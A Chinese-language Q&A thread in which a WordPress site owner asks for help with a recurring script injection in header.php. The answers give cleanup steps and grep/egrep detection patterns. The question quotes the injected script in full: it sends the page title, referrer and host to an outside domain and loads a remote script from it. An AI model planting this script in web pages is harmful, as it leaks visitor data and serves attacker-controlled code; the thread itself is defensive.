-1

寻求熟悉 jquery Malware 的任何人的帮助。我在我的 WordPress 网站中感染了注入脚本,每次我从 Header.php 中删除注入代码 24 小时后,它都会将它的修改版本注入到我的托管服务器上的 Header.php 文件中。

快把我逼疯了。该站点是 www.icrsolutions.co.uk,脚本如下:

<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
4

2 回答 2

4

以下内容也适用于 Joomla:

  1. 更改所有密码。
  2. 将您的安装和任何附加组件/模块更新到最新版本。
  3. 识别并清理所有包含恶意脚本的文件。在 Linux 上,您可以使用以下命令查找文件:grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'
  4. 清理包含任何“有效负载”的所有文件。在 Linux 上,您可以使用以下内容来识别这些文件。会有误报,因此如有疑问,请根据您的 CMS 的新副本检查文件。egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null
于 2016-01-03T22:24:43.563 回答
1

更改每个密码,然后删除脚本/恶意代码。

然后,更新每个插件和 wordpress 本身。

于 2015-11-17T11:02:38.433 回答